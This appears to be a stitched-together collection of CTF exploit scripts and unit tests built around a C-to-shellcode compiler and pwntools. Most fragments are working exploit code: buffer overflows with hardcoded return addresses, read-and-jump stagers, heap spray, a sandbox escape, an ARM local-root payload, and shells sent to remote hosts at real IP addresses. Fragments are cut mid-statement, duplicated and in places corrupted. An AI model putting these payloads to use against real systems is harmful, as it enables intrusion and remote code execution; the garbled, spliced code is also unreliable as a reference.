def test_test(self): cshc.arch("x86").compile(""" void *_memset(void *s, int c, size_t n) { unsigned char* p=s; while(n--) *p++ = (unsigned char)c; return s; } int main() { char buf[4096]; _memset(buf, 0, sizeof(buf)); _memset(buf, 0, sizeof(buf)); sys__exit(0); } """)
def _try(expr): r = remote("52.68.16.142", 10003 ,silent = True) tmpl = open("exploit.c").read() code = tmpl.replace("__EXPR__", expr) buf = cshc.arch("x86_64").compile(code) r.send(buf + "\0" * (8192 - len(buf))) t = time.time() b = r.recvuntil("Wow, It's beautiful!") delay = time.time() - t r.close() return delay >= THRESHOLD
from pwn import * import cshc context("amd64", "linux") shellcode = "" #enter 32-bit mode and execute stage2.c shellcode += flat( asm(r""" a: mov esp, 0x1000fffc mov ax, 0x2b mov ds, ax mov es, ax sub esp, 8 mov dword [esp+4], 0x23 mov dword [esp], b - a + 0x10000000 retf b: """)) shellcode += cshc.arch("x86").compile_file("stage2_sendflag.c") open("stage1.c", "w").write( open("stage1_tmpl.c").read().replace( "REPLACE_ME", "{" + ",".join([str(ord(val)) for val in shellcode]) + "}"))
push 3 pop eax cdq inc edx shl edx, 12 push 4 ;sockfd pop ebx int 0x80 jmp ecx caller: call callee int3 """)) if len(buf) <= 128: buf += "C" * (129 - len(buf)) assert not "\0" in buf #raw_input(">") r.sendline("search " + buf) sc = cshc.arch("x86").compile_file("exploit2_heapspray.c") assert len(sc) <= 4096 r.send(sc) time.sleep(0.5) sc2 = shellcode.dupsh(m_sockfd) r.send(p32(len(sc2))) r.send(sc2) r.interactive()
#!/usr/bin/python from pwn import * import cshc context("amd64", "linux") r = remote("pinhole.pwn.seccon.jp", 10000) #r = remote("ctf", 4000) raw_input(">"); #sysenter buf = flat(asm("sub rsp, 64")); buf += cshc.arch("x86_64").compile(open("exploit.c", "r").read()) assert len(buf) <= 280 buf += "A" * (280 - len(buf)) buf += p64(0x4089e6) buf += "A" * (512 - len(buf)) r.send(buf) r.interactive()
from pack import * import os import cshc buf = "" buf += "A" * (173 - len(buf)) buf += pl32(0x16370 + 173 + 4 + 1) buf += "A" buf += cshc.arch("armel").compile_file("root.c") print 480 - len(buf) assert len(buf) <= 480 buf_enc = ", ".join([hex(ord(ch)) for ch in buf]) open("/tmp/a.c", "w").write(open("template.c").read().replace("__PAYLOAD__", buf_enc)) os.system("arm-linux-gnueabi-gcc -o localroot /tmp/a.c")
pop ecx push 3 pop eax cdq inc edx shl edx, 12 push 4 ;sockfd pop ebx int 0x80 jmp ecx caller: call callee int3 """)) if len(buf) <= 128: buf += "C" * (129 - len(buf)) assert not "\0" in buf #raw_input(">") r.sendline("search " + buf) sc = cshc.arch("x86").compile_file("exploit2.c") assert len(sc) <= 4096 r.send(sc) time.sleep(0.5) sc2 = shellcode.dupsh(m_sockfd) r.send(sc2) r.interactive()
def test_aarch64(self): self.check_shellcode("aarch64", cshc.arch("aarch64").compile(self.SRC))
def test_armel(self): self.check_shellcode("armel", cshc.arch("armel").compile(self.SRC))
def test_x86(self): self.check_shellcode("x86", cshc.arch("x86").compile(self.SRC))
def test_aarch64(self): self.check_shellcode("aarch64", cshc.arch("aarch64").compile_file("examples/test.c"))
def test_armel(self): self.check_shellcode("armel", cshc.arch("armel").compile_file("examples/test.c"))
def test_x86(self): self.check_shellcode("x86", cshc.arch("x86").compile_file("examples/test.c"))
#!/usr/bin/python from pwn import * import cshc context("amd64", "linux") r = remote("188.40.18.84", 1234) print r.recvline() #sc = flat(shellcode.cat("/proc/self/maps")) #sc = flat(shellcode.cat("/home/user/pin/source/tools/31C3_pin_escape/obj-intel64/31C3_pin_escape.so")) sc = cshc.arch("x86_64").compile_file("pindestroy.c") sc += "\x90" * 8 print len(sc), "/", 4086 assert len(sc) <= 4086 r.send(sc) print r.recvall()
assert not "\n" in buf assert len(buf) <= 256 r.sendline(buf) #execute shellcode shellcode = inputadr + 0x40 buf = "" buf += "A" * 0x38 buf += p64(shellcode) # stager buf += flat(asm(r""" _start: xor edi, edi mov edx, 8192 sub rsp, rdx mov rsi, rsp xor eax, eax syscall jmp rsi """)) assert not "\n" in buf assert len(buf) <= 256 r.sendline(buf) r.recvuntil("Login: Password: "******"x86_64").compile(open("exploit.c", "r").read().replace("LIBC_BASE", str(libc_base))) assert len(shellcode) <= 8192 r.send(shellcode) r.interactive()